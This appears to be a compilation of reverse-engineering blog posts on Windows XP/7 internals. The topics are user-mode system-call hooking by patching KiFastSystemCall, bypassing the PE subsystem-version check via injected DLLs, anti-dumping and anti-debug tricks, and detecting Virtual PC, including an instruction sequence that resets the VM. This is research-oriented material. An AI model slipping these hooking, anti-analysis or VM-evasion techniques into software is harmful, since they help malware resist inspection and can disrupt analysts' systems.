Native x86 User-mode System Calls Hooking

In this post I am going to explain how to implement system call hooking from user mode for native x86 processes (here I refer to 32-bit processes running on 32-bit versions of Windows XP SP2 and SP3).

Let's have a look at the "ZwOpenProcess" function of Windows XP SP2 and of Windows XP SP3.

1) XP SP2


2) XP SP3

As you can see in the images above, EAX is set to 0x7A, the system call ordinal, and EDX is made to point at 0x7FFE0300 in the _KUSER_SHARED_DATA page. Then comes a CALL instruction which jumps to the "KiFastSystemCall" function, whose address is stored at 0x7FFE0300 (_KUSER_SHARED_DATA::SystemCall).

One difference we can see is that SYSENTER of XP SP2 is followed by 5 NOPs while in XP SP3 SYSENTER is directly followed by the RET of the "KiFastSystemCallRet" function.
 
The first thing one may think of to implement the user-mode system call hook in Windows XP SP2/SP3 is to overwrite the "_KUSER_SHARED_DATA::SystemCall" and "_KUSER_SHARED_DATA::SystemCallRet" fields. Unfortunately, this is not possible since the page is not writable and any attempt to change its memory protection fails.

So, we should now turn to the "KiFastSystemCall" function and try to overwrite its very first instruction with a JMP instruction. Is this all? Let's see.

For XP SP2, it is okay to write a near JMP instruction (5 bytes long) since we have enough space (filled with 5 NOPs) and this does not hurt the RET instruction of the "KiFastSystemCallRet" function. But for XP SP3, any attempt to write the near JMP instruction will hurt the "KiFastSystemCallRet" function. Is there a common method for both XP SP2 and SP3?

I thought about that and came up with something that worked for both service packs: allocate a memory page at an address which, when converted from absolute to relative, gives 0xC3 (the RET opcode) as the fifth byte of the new JMP instruction, so the byte that overlaps the RET of "KiFastSystemCallRet" keeps its value. For example, if we allocate a memory page at 0x3F910000, given that the "KiFastSystemCall" function is at 0x7C90E510, we get the new JMP instruction as the byte sequence "\xE9\xEB\x1A\x00\xC3". You can check the source code of InjectHookLib for more information.

N.B. We can still use a short JMP (2 bytes long) instead: search for any vacant 5 bytes within reach of its signed 8-bit displacement (-128 to +127 bytes, counted from the end of the short JMP) and place the near JMP there. LEA ESP,[ESP] seems to be okay for both service packs.
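
The 0xC3 trick for the near JMP described above can be checked with a few lines of Python. This is only a sketch of the arithmetic, not code from InjectHookLib; the function names are made up for illustration, and the two addresses are the ones quoted in the text.

```python
import struct


def encode_near_jmp(src: int, dst: int) -> bytes:
    """Encode a 5-byte near JMP (E9 rel32) placed at src that lands on dst."""
    # rel32 is counted from the end of the 5-byte instruction.
    rel32 = (dst - (src + 5)) & 0xFFFFFFFF
    return b"\xE9" + struct.pack("<I", rel32)


def keeps_ret_intact(src: int, dst: int) -> bool:
    """True if the fifth byte of the JMP equals 0xC3, the RET opcode."""
    return encode_near_jmp(src, dst)[4] == 0xC3


def hook_address_range(src: int):
    """First and last destination whose rel32 has 0xC3 as its top byte.

    The range is computed modulo 2**32, so for some src values it may wrap.
    """
    first = (src + 5 + 0xC3000000) & 0xFFFFFFFF
    last = (src + 5 + 0xC3FFFFFF) & 0xFFFFFFFF
    return first, last


KI_FAST_SYSTEM_CALL = 0x7C90E510  # address quoted in the text
HOOK_PAGE = 0x3F910000            # allocation address quoted in the text

print(encode_near_jmp(KI_FAST_SYSTEM_CALL, HOOK_PAGE).hex())
print([hex(a) for a in hook_address_range(KI_FAST_SYSTEM_CALL)])
```

Any allocation address inside the printed range would do, as long as the OS agrees to allocate there.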

N.B. With certain processors or under certain conditions, e.g. disabled VT-x/AMD-V if using VirtualBox, the "KiFastSystemCall" function is not used at all and the "KiIntSystemCall" function is used instead. In these cases, you can safely overwrite the first instructions of the "KiIntSystemCall" function with a near JMP instruction as long as the code you hook to takes care of that.


Any ideas or suggestions are always very welcome.

You can follow me @waleedassar

Major / MinorSubsystemVersion

If you are still using Windows 2000, you must have noticed that certain executables refuse to run. Actually, this is due to the executables being built with Microsoft Visual Studio 2010, which sets the MajorSubsystemVersion and MinorSubsystemVersion in the PE header to 5 and 1. In other words, it creates executables to run on Windows XP (5.1) and above. This causes Windows 2000 (5.0) to refuse to load these executables.

Now, let's see where the check occurs and how to bypass it. The first place to check must be the kernel32 "CreateProcess" function.


If we start at address 0x7C4F1ECE, we can see a call to the ntdll "ZwQuerySection" function with the "InformationClass" parameter set to 1 (SectionImageInformation). After the "ZwQuerySection" function has returned successfully, the "SECTION_IMAGE_INFORMATION" structure should be filled with some useful data. Among the data returned are the executable's subsystem type and minor and major versions.

Then comes a check for the subsystem type. The subsystem type must be either GUI (IMAGE_SUBSYSTEM_WINDOWS_GUI) or console (IMAGE_SUBSYSTEM_WINDOWS_CUI). If it is neither of these two types, the "CreateProcess" function fails.


As you can see in the image above, at address 0x7C4F1F91, the major and minor subsystem versions extracted from the PE header via the "ZwQuerySection" function are passed to the "CheckSubSystem" function. If the "CheckSubSystem" function returns TRUE, the "CreateProcess" function proceeds, and if it returns FALSE, the "CreateProcess" function fails. Now, let's check this function.


As you can see in the disassembly and C code in the three images above, if the subsystem version extracted from the PE header is less than 3.10, the "CheckSubSystem" function returns FALSE. Then comes the important part: if the "MajorSubsystemVersion" extracted from the PE header is greater than the value of the "NtMajorVersion" field (at offset 0x26C in the _KUSER_SHARED_DATA page), the function fails. If "MajorSubsystemVersion" and "NtMajorVersion" are equal, the same comparison is made between "MinorSubsystemVersion" and "NtMinorVersion".
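
The logic described above can be restated as a short sketch. It only follows the prose of this post, not the actual disassembly; the function and parameter names are my own.

```python
def check_subsystem(major: int, minor: int, nt_major: int, nt_minor: int) -> bool:
    """Return True if an image with subsystem version major.minor may run.

    nt_major/nt_minor stand for NtMajorVersion/NtMinorVersion of the OS.
    """
    # Anything older than 3.10 is rejected.
    if major < 3 or (major == 3 and minor < 10):
        return False
    # The image must not ask for a newer OS than the one it is loaded on.
    if major > nt_major:
        return False
    if major == nt_major and minor > nt_minor:
        return False
    return True


# A Visual Studio 2010 build (5.1) on Windows 2000 (5.0) and on Windows XP (5.1).
print(check_subsystem(5, 1, 5, 0))
print(check_subsystem(5, 1, 5, 1))
```

The first call prints False and the second prints True, which is exactly the Windows 2000 vs. Windows XP behavior discussed in this post.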

N.B. NtMajorVersion and NtMinorVersion are usually the same as the OS version info. returned by the kernel32 "GetVersion" or "GetVersionEx" functions.

As a developer, bypassing the check can easily be done by using Platform Toolset v9 in Microsoft Visual Studio (thanks @skier_t) or by directly editing the PE header of the executable using any PE editor.
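
For those who prefer a script to a PE editor, here is a minimal sketch of the same edit. It relies on the documented PE layout (e_lfanew at offset 0x3C, MajorSubsystemVersion at offset 48 of the optional header); the function names and the stub image are hypothetical and only there to keep the example self-contained.

```python
import struct

SUBSYSTEM_VERSION_OFFSET = 48  # MajorSubsystemVersion within the optional header


def optional_header_offset(image) -> int:
    """Return the offset of IMAGE_OPTIONAL_HEADER in a PE image buffer."""
    if bytes(image[:2]) != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if bytes(image[e_lfanew:e_lfanew + 4]) != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20  # skip the signature and IMAGE_FILE_HEADER


def get_subsystem_version(image):
    offset = optional_header_offset(image) + SUBSYSTEM_VERSION_OFFSET
    return struct.unpack_from("<HH", image, offset)  # (major, minor)


def set_subsystem_version(image: bytearray, major: int, minor: int) -> None:
    offset = optional_header_offset(image) + SUBSYSTEM_VERSION_OFFSET
    struct.pack_into("<HH", image, offset, major, minor)


def make_stub_image(major: int, minor: int) -> bytearray:
    """Hypothetical helper: a header-only buffer, just enough for the demo."""
    image = bytearray(0x200)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)  # e_lfanew
    image[0x80:0x84] = b"PE\0\0"
    set_subsystem_version(image, major, minor)
    return image


stub = make_stub_image(5, 1)       # the version pair mentioned in the text
set_subsystem_version(stub, 5, 0)  # make it acceptable to Windows 2000
print(get_subsystem_version(stub))
```

On a real file you would read the bytes into a bytearray, patch them, and write them back. Note that this sketch does not touch the CheckSum field.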

Imagine the scenario where the executable in question performs a CRC check on its PE header as part of the implemented protection scheme. In this case, as a user, you won't be able to run the executable since any attempt to edit the PE header will cause the CRC check to fail. This leads us to find a system-wide solution. Yes, patching.

Speaking of patching, we have two options:

1) The first is to patch a couple of addresses inside the "CheckSubSystem" function (actually, I don't recommend patching the return value check).

To implement the check bypass, I created a dynamic link library, hooksubsystem.dll, that once injected into a process bypasses the subsystem version check.

You can find the source code of hooksubsystem.dll here.
You can find hooksubsystem.dll here.

One drawback of this method is that it is service-pack-specific since the "CheckSubSystem" function is not exported by kernel32.dll.

2) The second is to patch the "ZwQuerySection" function such that we can manipulate the data returned in the "SECTION_IMAGE_INFORMATION" structure before it is used by the "CheckSubSystem" function.

To implement this method, I created another version of hooksubsystem.dll. You can find it here and its source code here.

I also created a small application, BypassSubSystem.exe, which installs a system-wide hook of the type provided in the command line arguments. It can be used in the way you see in the image below.
BypassSubSystem.exe can be downloaded from here and its source code from here.

In a future post I will go deeper into this topic.



Anti-Dumping - Part 3

In this post I will share with you a couple of small tricks that can be deployed to harden against or defeat memory dumping attempts. As I have just mentioned, they are small tricks, so don't flame me.

The first trick briefly involves appending a special section header to the section table of your executable. The new section header is to be set with a huge virtual size. Don't worry, this is not going to affect the file size (on disk) since we can set the raw size of the new section to zero (completely virtual section).

This results in the "SizeOfImage" field of the IMAGE_OPTIONAL_HEADER structure being huge as well.
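
To see why one extra header is enough, here is a rough sketch of how "SizeOfImage" follows from the section table. It assumes the usual relation (end of the highest section, rounded up to SectionAlignment); the section values are invented for the example.

```python
def align_up(value: int, alignment: int) -> int:
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def size_of_image(sections, section_alignment: int = 0x1000) -> int:
    """sections is a list of (VirtualAddress, VirtualSize) pairs."""
    end = max(va + vsize for va, vsize in sections)
    return align_up(end, section_alignment)


# Hypothetical layout: two ordinary sections...
normal = [(0x1000, 0x800), (0x2000, 0x200)]
# ...plus one purely virtual section (raw size zero) of 1 GB.
hardened = normal + [(0x3000, 0x40000000)]

print(hex(size_of_image(normal)))
print(hex(size_of_image(hardened)))
```

The second value is what a dumping tool would try to allocate in one go.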

Unlike old anti-dumping tricks, we don't have to forge the "SizeOfImage" field of PEB.LoaderData or that in the PE Header memory page. Here, we give the dumping tools a huge value that they are very likely to fail to allocate using e.g. the "VirtualAlloc" function or its likes. Of course, this trick does not defeat dumping tools that read the memory of processes page by page.

Since the raw size of this huge section is zero, the new section is zero-initialized, and as long as it is never touched the OS memory manager does not have to keep it in memory, which keeps the memory usage of such a process as low as possible.

It is now obvious that the new section should be left as it is. Your code should never read, write, or execute it, as any attempt to e.g. write to it results in the OS memory manager restoring the whole section into memory.

Here you can find a demo.

The second trick was first mentioned by Kris Kaspersky. The trick is very nice and simple. If we set the memory protection of one section as PAGE_GUARD, then the "ReadProcessMemory" function will fail usually with the system error code ERROR_PARTIAL_COPY, 0x12B. To defeat this trick, dumping tools are now using the "VirtualProtectEx" function to remove the PAGE_GUARD attribute, then read the section, and finally restore the PAGE_GUARD attribute.

To enhance this trick, I have created a watching thread that calls the "VirtualQuery" function in an infinite loop and, once it detects that PAGE_GUARD has been removed from the section's memory protection attributes, terminates the process. Here is the code and here is a demo.
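
The watching loop boils down to something like the sketch below. It is not the linked code: read_protect is a hypothetical callback standing in for the "Protect" value returned by "VirtualQuery", and on_tamper stands in for terminating the process.

```python
import time

PAGE_GUARD = 0x100


def guard_removed(protect: int) -> bool:
    """True if the PAGE_GUARD modifier is missing from a protection value."""
    return (protect & PAGE_GUARD) == 0


def watch(read_protect, on_tamper, max_polls=None, interval=0.0) -> bool:
    """Poll read_protect() until PAGE_GUARD disappears, then call on_tamper().

    max_polls=None means poll forever, like the watching thread in the text.
    Returns True if tampering was seen, False if max_polls ran out.
    """
    polls = 0
    while max_polls is None or polls < max_polls:
        if guard_removed(read_protect()):
            on_tamper()
            return True
        polls += 1
        if interval:
            time.sleep(interval)
    return False


# Simulated readings: guarded, guarded, then the dumper strips PAGE_GUARD.
readings = iter([0x104, 0x104, 0x004])
print(watch(lambda: next(readings), lambda: print("terminate"), max_polls=5))
```

In the real thing the callback would query the guarded section of the current process, and the loop would run in its own thread.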

N.B. For the second trick to be effective, you should place the sections you want to protect after the PAGE_GUARD section so that the process terminates before they are dumped.

N.B. The second trick theoretically has better chances to work on multi-processor systems than on single-processor ones.

Any comments or ideas are very welcome.


PAGE_EXECUTE_WRITECOPY As Anti-Debug Trick

In this post, I will share with you a rarely discussed anti-debug trick that I may be the first one to discover or disclose.

Now let's start with a quick introduction. If a memory page with the "PAGE_EXECUTE_READWRITE" access protection attributes is requested from the OS for a mapped image (as opposed to private memory from "VirtualAlloc"), then a page with the "PAGE_EXECUTE_WRITECOPY" attributes, not the "PAGE_EXECUTE_READWRITE" attributes, is given.

The reason for that behavior is simple: the OS memory manager wants to physically share the page between all the process instances (since it is guaranteed to be the same in all the process instances before any write).

Once you make the first write to the new page, the OS assigns a private copy of the page to the process in which the write occurs and the page attributes change to PAGE_EXECUTE_READWRITE.

N.B. The same applies to pages requested with the PAGE_READWRITE attributes. They are initially given the "PAGE_WRITECOPY" attributes and after the first write, they turn into PAGE_READWRITE.

N.B. PAGE_EXECUTE_WRITECOPY and PAGE_WRITECOPY are not valid parameters to the "VirtualAlloc" or "VirtualAllocEx" function.

Now if you have a section in your executable with the read, write, and execute access attributes (see section xyz in the image below), then the above applies to it.
The access protection attributes given to section xyz cause its memory page to be mapped with the "PAGE_EXECUTE_WRITECOPY" attributes. See image below.
If we design section xyz in a way that it is never written to (e.g. does not contain self-modifying code) throughout the whole lifetime of the process, then the page will always be PAGE_EXECUTE_WRITECOPY, even at process exit.

If the attributes change to PAGE_EXECUTE_READWRITE, that means the page must have been written to, e.g. when another process, most likely a debugger, called the "WriteProcessMemory" function while stepping over, tracing over, or placing software breakpoints. That definitely means the process is being debugged. See images below.

Now the executable in question can call the "VirtualQuery" function to check the page protection attributes of section xyz. If it is something other than PAGE_EXECUTE_WRITECOPY, then a debugger is present and the process should quit.
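
A minimal sketch of that check, written with ctypes so the structure layout is visible. It is not the code of the demo; page_was_written and query_protect are names I made up, and query_protect can only be called on Windows.

```python
import ctypes

PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80


class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("BaseAddress", ctypes.c_void_p),
        ("AllocationBase", ctypes.c_void_p),
        ("AllocationProtect", ctypes.c_uint32),
        ("RegionSize", ctypes.c_size_t),
        ("State", ctypes.c_uint32),
        ("Protect", ctypes.c_uint32),
        ("Type", ctypes.c_uint32),
    ]


def page_was_written(protect: int) -> bool:
    """True if a page that started as WRITECOPY no longer has that protection."""
    return (protect & 0xFF) != PAGE_EXECUTE_WRITECOPY


def query_protect(address: int) -> int:
    """Windows only: return the current protection of the page at address."""
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.VirtualQuery.restype = ctypes.c_size_t
    kernel32.VirtualQuery.argtypes = [
        ctypes.c_void_p,
        ctypes.POINTER(MEMORY_BASIC_INFORMATION),
        ctypes.c_size_t,
    ]
    mbi = MEMORY_BASIC_INFORMATION()
    if not kernel32.VirtualQuery(address, ctypes.byref(mbi), ctypes.sizeof(mbi)):
        raise ctypes.WinError(ctypes.get_last_error())
    return mbi.Protect


print(page_was_written(PAGE_EXECUTE_WRITECOPY))  # untouched section
print(page_was_written(PAGE_EXECUTE_READWRITE))  # somebody wrote to it
```

In the executable itself the address passed to query_protect would be somewhere inside section xyz.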

The good thing about this trick is that, unlike the 0xCC-scanning trick, it can detect software breakpoints even if they are no longer active (removed by the debugger).

Also, most debuggers in their default settings place software breakpoints on modules' entry points, which means the page protection attributes change even before the reverse engineer starts to debug the module.

A common way to bypass this trick for stepping over and tracing over is to use hardware breakpoints, which are available in OllyDbg v1.10 and OllyDbg v2.01 (alpha 4).

A simple demo can be found here and its source code from here.

Any ideas or comments are very welcome.


Virtual PC Machine Reset

While playing with Virtual PC 2007, I came up with an interesting trick not only to detect Virtual PC 2007 but also to reset (restart) the virtual machine.

The trick is so simple that all you need to do in your code is execute "\x0F\xC7\xC8\x05\x00".

Executing that x86 instruction sequence causes the following message to pop up.
A POC can be found here and its source from here.

N.B. Other x86 instruction sequences can cause the same result.

Any comments or ideas are welcome.

Virtual PC vs. Resume Flag

In this post I will show you another weird behavior of Virtual PC 2007. I encountered this weird behavior while playing with Virtual PC 2007 with Windows XP SP3 installed inside. The behavior is all about how a Windows XP Virtual PC virtual machine handles the Resume Flag.

For those who don't know, the Resume Flag (bit 16 of the EFLAGS register) is used to temporarily disable hardware breakpoint exceptions for one instruction. Without it, a Hardware-Breakpoint-On-Execution would infinitely trigger an EXCEPTION_SINGLE_STEP exception.

According to @osxreverser, Windows XP does not support the Resume Flag (RF). I was also amazed to see that WinDbg and OllyDbg v1.10 don't use the resume flag. They use the Trap Flag (TF) instead.

Running a simple executable that on purpose makes use of the Resume Flag inside an XP Virtual PC virtual machine, I found out that execution flows normally as if XP supports the resume flag.

Given the finding above, I created a small executable that tries to detect if it is running inside Virtual PC 2007.
You can find it here and its source code from here.

I guess the finding above only applies if the host operating system itself supports the resume flag e.g. Windows 7 or later.

N.B. This topic is still under research.

Please don't hesitate to leave a comment.

Virtual PC vs. DR7

In this post I will show you another weird behavior of Virtual PC 2007. This time the trick is about how Virtual PC handles the debug register DR7, known as the Debug Control register.

For those who don't know, DR7 is used to specify the conditions under which the EXCEPTION_SINGLE_STEP exception is triggered for addresses held in DR0-DR3.
If we want to dissect DR7, it would be as follows:
Bit 0  ---> DR0 is locally enabled.
Bit 1  ---> DR0 is globally enabled.
Bit 2  ---> DR1 is locally enabled.
Bit 3  ---> DR1 is globally enabled.
Bit 4  ---> DR2 is locally enabled.
Bit 5  ---> DR2 is globally enabled.
Bit 6  ---> DR3 is locally enabled.
Bit 7  ---> DR3 is globally enabled.

Bit 8  ---> The "Local Enable Bit". Also for "Last Branch" tracing.
Bit 9  ---> The "Global Enable Bit". Also for "Last Branch" tracing.
Bit 10 ---> Reserved.
Bit 11 ---> Reserved.
Bit 12 ---> IR
Bit 13 ---> GD
Bit 14 ---> TB
Bit 15 ---> TT

Bits 16-17 ---> When DR0 is triggered.
Bits 18-19 ---> Size of DR0's trigger condition.
Bits 20-21 ---> When DR1 is triggered.
Bits 22-23 ---> Size of DR1's trigger condition.

Bits 24-25 ---> When DR2 is triggered.
Bits 26-27 ---> Size of DR2's trigger condition.
Bits 28-29 ---> When DR3 is triggered.
Bits 30-31 ---> Size of DR3's trigger condition.

For example:
Imagine we want to place a Hardware-Breakpoint-On-Execution for an instruction at 0x401000. See image below.

What the debugger does in this case is:
1) Sets DR0 to 0x401000.
2) Sets bit 0 of DR7 to 1.
3) Sets bit 8 of DR7 to 1 (for backward compatibility).
4) Sets bits 16 and 17 of DR7 to 00 (00 means On-Execution).

Now imagine we then want to place a Hardware-Breakpoint-On-Write-Four for memory at 0x10000. See image below.
What the debugger does in this case is:
1) Sets DR1 to 0x10000.
2) Sets bit 2 of DR7 to 1.
3) Sets bit 8 of DR7 to 1 (for backward compatibility).
4) Sets bits 20 and 21 of DR7 to 01 (01 means On-Write).
5) Sets bits 22 and 23 of DR7 to 11 (11 for the size of trigger condition means to watch four bytes).
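
The two examples above can be reproduced with a small helper that assembles the DR7 bits for one debug register. This is only a sketch of the bit layout listed earlier; the function and constant names are mine.

```python
RW_EXECUTE = 0b00  # break on execution
RW_WRITE = 0b01    # break on write
LEN_1 = 0b00       # watch one byte (also used for execution breakpoints)
LEN_4 = 0b11       # watch four bytes


def dr7_bits(index: int, rw: int, length: int, set_bit8: bool = True) -> int:
    """DR7 bits that locally enable DR<index> with the given condition."""
    if not 0 <= index <= 3:
        raise ValueError("there are only four address registers, DR0-DR3")
    value = 1 << (index * 2)                # local enable bit of DR<index>
    if set_bit8:
        value |= 1 << 8                     # bit 8, set for backward compatibility
    value |= (rw & 0b11) << (16 + index * 4)      # when the breakpoint triggers
    value |= (length & 0b11) << (18 + index * 4)  # size of the trigger condition
    return value


on_exec = dr7_bits(0, RW_EXECUTE, LEN_1)  # first example, DR0 = 0x401000
on_write4 = dr7_bits(1, RW_WRITE, LEN_4)  # second example, DR1 = 0x10000

print(hex(on_exec))
print(hex(on_exec | on_write4))
```

With both breakpoints in place the debugger ends up writing the OR of the two values to DR7.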

Now let's try to get back to the main topic of this post.

Hereafter, I will call the second byte of DR7 (byte 0xBB of 0xDDCCBBAA) the flags byte, just for brevity.

On Windows XP, if we set the flags byte to any value ranging from 0x00 to 0xFF, the breakpoint is always active and the exception is always raised whenever the trigger condition is met e.g. if we set DR7 to 0x0000FF01 (a hardware breakpoint On-Execution with Local enable, global enable, reserved, reserved, IR, GD, TB, and TT bits set), the exception is raised whenever the address in DR0 executes.
The same applies for Windows 7.

What about Virtual PC 2007? 

In Virtual PC 2007 with Windows XP installed inside, with certain flags set in DR7 e.g. 0x00003F01, the breakpoint is sometimes not activated.

So, I created a simple executable that brute-forces DR7's flags byte and, based on the number of times the exception is raised, determines whether it is running inside Virtual PC 2007.
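
The brute-force idea can be sketched as follows. This is not the demo's code: breakpoint_fires is a hypothetical callback that would set DR7, run the watched instruction and report whether the exception arrived, and the "fewer than 256 hits" threshold is my assumption based on the behavior described above.

```python
def dr7_candidates(enable_bits: int = 0x01):
    """All 256 DR7 values that differ only in the flags byte (bits 8-15)."""
    return [(flags << 8) | enable_bits for flags in range(0x100)]


def count_hits(breakpoint_fires) -> int:
    """Count how many candidate DR7 values still trigger the breakpoint."""
    return sum(1 for dr7 in dr7_candidates() if breakpoint_fires(dr7))


def looks_like_virtual_pc(hits: int) -> bool:
    """Assumption: on real hardware every flags byte triggers the exception."""
    return hits < 0x100


# Simulated machines: one that always fires, one that misses 0x00003F01.
real_machine = lambda dr7: True
simulated_vm = lambda dr7: dr7 != 0x00003F01

print(looks_like_virtual_pc(count_hits(real_machine)))
print(looks_like_virtual_pc(count_hits(simulated_vm)))
```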

You can download the demo from here and its source code from here.
 
N.B. It has been tested with Windows XP SP2 and SP3.
N.B. VirtualBox is also affected, but I will leave this for a future post.


Any comments or ideas are very welcome.

Virtual PC vs. CPUID

In this post I will show another weird behavior of Virtual PC 2007. This time it is about the CPUID instruction. As most of you already know well what CPUID is for and how it works, I will directly jump into the main topic.

In Virtual PC, executing CPUID disables interrupts for one instruction. Oh, wait, how is that?

Imagine we want to trace a sequence of x86 instructions. What the debugger does in that situation is as follows:
1) Calls the "GetThreadContext" function to extract the current context of the thread executing this sequence of instructions.
2) Modifies the "EFLAGS" register of the "CONTEXT" structure such that the Trap flag (TF) is set. EFLAGS is situated at offset 0xC0 from the start of the structure for the x86 version. TF is bit number 8 (0x100).
3) Calls the "SetThreadContext" and "ContinueDebugEvent" functions to continue execution.
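
Step 2 of the list above, sketched on a raw buffer. The offset and the flag value are the ones given in the text; the buffer merely stands in for an x86 "CONTEXT" structure, and its size of 0x2CC bytes is my assumption.

```python
import struct

CONTEXT_EFLAGS_OFFSET = 0xC0  # EFLAGS inside the x86 CONTEXT, per the text
TRAP_FLAG = 0x100             # bit 8 of EFLAGS


def set_trap_flag(context: bytearray) -> int:
    """Set TF in the EFLAGS slot of a raw x86 CONTEXT buffer; return new EFLAGS."""
    eflags = struct.unpack_from("<I", context, CONTEXT_EFLAGS_OFFSET)[0]
    eflags |= TRAP_FLAG
    struct.pack_into("<I", context, CONTEXT_EFLAGS_OFFSET, eflags)
    return eflags


# Stand-in for what "GetThreadContext" would have filled in.
context = bytearray(0x2CC)
struct.pack_into("<I", context, CONTEXT_EFLAGS_OFFSET, 0x202)

print(hex(set_trap_flag(context)))
```

A real debugger would then hand the modified structure to "SetThreadContext" and call "ContinueDebugEvent".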

When the trap flag is set, after executing an x86 instruction, an EXCEPTION_SINGLE_STEP exception is raised and the trap flag is cleared.

The debugger receives the exception and resets the trap flag as shown above and so on.

Disable interrupts, what does that mean?
When certain instructions are executed while the trap flag is set, no EXCEPTION_SINGLE_STEP exception is raised after them. The exception is raised after executing the instruction following them. One example instruction that disables interrupts is POP SS. POP SS has been used for a long time as an anti-tracing trick. Since it disables interrupts for one instruction, dumping the EFLAGS register to the stack via PUSHFD right after it reveals the Trap Flag.

Executing CPUID in Virtual PC 2007, I found out that it has the same effect as POP SS. CPUID disables interrupts for one instruction.

I created a simple demo that exploits this bug to detect whether it is running inside Virtual PC 2007. It has been tested on Windows XP SP2 running inside Virtual PC 2007.

The reason for that is still under research, but it seems to be due to the Virtualized CPUID (Intel FlexMigration) hardware support since the trick only works if Hardware Virtualization is enabled.

You can download the demo from here and its source code from here.

N.B. VirtualBox v4.1.22 r80657 is also affected by this bug.

N.B. Parallels Desktop is reportedly affected by this bug.


SizeOfStackReserve As Anti-Attaching Trick

In this post I will show you a new anti-attaching trick that has been tested on Windows 7. It does not work on Windows XP, since it relies on the changes Microsoft later introduced in the way threads are created.

Let's first see how thread creation in Windows 7 is different from that of Windows XP.

In Windows XP, whenever you call the kernel32 "CreateRemoteThread" or the ntdll "RtlCreateUserThread" function to create a new thread, the following occurs underneath:

The kernel32 "BaseCreateStack" or ntdll "RtlpCreateStack" function is called in case of "CreateRemoteThread" or "RtlCreateUserThread" respectively to allocate space for the new thread's stack in the address space of the target process.

N.B. The kernel32 "CreateThread" function is only a call to the kernel32 "CreateRemoteThread" function with the "hProcess" parameter set to -1.

Since there is no big difference between the "BaseCreateStack" and "RtlpCreateStack" functions, it is enough for us to look at the disassembly of the "BaseCreateStack" function in this post.

The "BaseCreateStack" function takes four parameters, only three of which are of interest. The first parameter is the handle to the process in which we are about to allocate user stack memory. The second parameter is the size in bytes of user stack memory to COMMIT into the target process's address space. The third parameter is the size in bytes of user stack memory to RESERVE into the target process's address space. Hereafter, I will refer to them as hProcess, CommitSize, and ReserveSize.

N.B. If you call the "CreateRemoteThread" function with the "dwStackSize" parameter set to e.g. 0x10000, then BaseCreateStack commits 0x10000 bytes. On the other hand, if the "CreateRemoteThread" function is called with the "dwCreationFlags" parameter having the "STACK_SIZE_PARAM_IS_A_RESERVATION" flag set, then BaseCreateStack reserves 0x10000 bytes.

Now, let's dive into the "BaseCreateStack" function and see what is going on inside.

1) It extracts the value of ImageBase from the PEB of the process in which it is called; the value is then passed to the "RtlImageNtHeader" function. If the "RtlImageNtHeader" function fails, the error ERROR_BAD_EXE_FORMAT is returned.

2) If the "ReserveSize" parameter passed to it is zero, it uses the value of the "SizeOfStackReserve" field of the IMAGE_OPTIONAL_HEADER structure.

3) Similarly, if the "CommitSize" parameter passed to it is zero, it uses the value of the "SizeOfStackCommit" field of the IMAGE_OPTIONAL_HEADER structure. Please remember that the values are extracted from the PE header of the main executable of the process that is calling the "CreateRemoteThread" function, not the target process.



4) It then makes some sanity checks on the ReserveSize and CommitSize, for example to ensure that the commit size is never greater than the reserve size. It also checks to ensure that the commit size is never lower than the value of the "MinimumStackCommit" field of the PEB.




5) It calls the "ZwAllocateVirtualMemory" function to reserve memory of size ReserveSize into the address space of the target process with the PAGE_READWRITE protection attribute.


6) It calls the "ZwAllocateVirtualMemory" function to commit CommitSize+0x1000 of the memory reserved in the previous step.



7) The extra page committed in the previous step is then given the PAGE_GUARD protection attribute.
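
Steps 5 to 7 can be pictured with a little address arithmetic. The sketch below assumes that the committed part sits at the top of the reserved region (stacks grow downwards) and that the guard page is the lowest committed page; the function name and the example numbers are mine.

```python
PAGE_SIZE = 0x1000


def xp_stack_layout(allocation_base: int, reserve_size: int, commit_size: int) -> dict:
    """Addresses of interest for a stack reserved at allocation_base."""
    stack_base = allocation_base + reserve_size  # highest address of the stack
    committed_start = stack_base - (commit_size + PAGE_SIZE)
    if committed_start < allocation_base:
        raise ValueError("commit size plus guard page exceeds the reservation")
    return {
        "stack_base": stack_base,
        "stack_limit": committed_start + PAGE_SIZE,  # lowest usable address
        "guard_page": committed_start,               # the extra PAGE_GUARD page
        "committed_bytes": commit_size + PAGE_SIZE,
    }


# Hypothetical numbers: 1 MB reserved at 0x30000, one page committed.
layout = xp_stack_layout(0x30000, 0x100000, 0x1000)
for name, value in layout.items():
    print(name, hex(value))
```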


Here is similar reversed code of the "BaseCreateStack" function, from here.


The reason why a PAGE_GUARD page always exists at the end of the committed stack is for the kernel to be notified each time the stack needs to be expanded. For example, if a thread tries to touch its stack's PAGE_GUARD page, a STATUS_GUARD_PAGE_VIOLATION exception is raised and swallowed by the kernel, which automatically commits one more page.

N.B. If a thread tries to touch the PAGE_GUARD page of another thread's stack, the exception is passed to the application or the debugger.

After the stack has been allocated in the target process's address space, the "CreateRemoteThread" function formulates a CONTEXT structure for the new thread. After the previous steps have completed successfully, the "ZwCreateThread" function is called to initiate the new remote thread.

Now let's see how threads are created in Windows 7.

In Windows 7, if we take the "CreateRemoteThread" or "RtlCreateUserThread" function into disassembly, we will see that the "dwStackSize" is directly passed to the "ZwCreateThreadEx" function.
So, our first assumption here is that stack allocation is now forwarded to the kernel. Also, we can note that in versions of Windows later than XP, the "ZwCreateThreadEx" function is used by default for thread creation instead of the "ZwCreateThread" function.

Now let's check the "NtCreateThreadEx" function in ntoskrnl.exe.

We can easily see in "NtCreateThreadEx" a call to the "PspCreateThread" function.
The "PspCreateThread" function calls the "PspAllocateThread" function, which calls the "RtlCreateUserStack" function.


The "RtlCreateUserStack" function is called after attaching to the target process's address space. Now let's look at the "RtlCreateUserStack" function in disassembly.

Now it is easy to see that it reads the PE header from the main executable of the process in which the remote thread is being created unlike XP where information was extracted from the main executable of the process that creates the thread. Yeah, it seems Microsoft fixed a very minor issue.


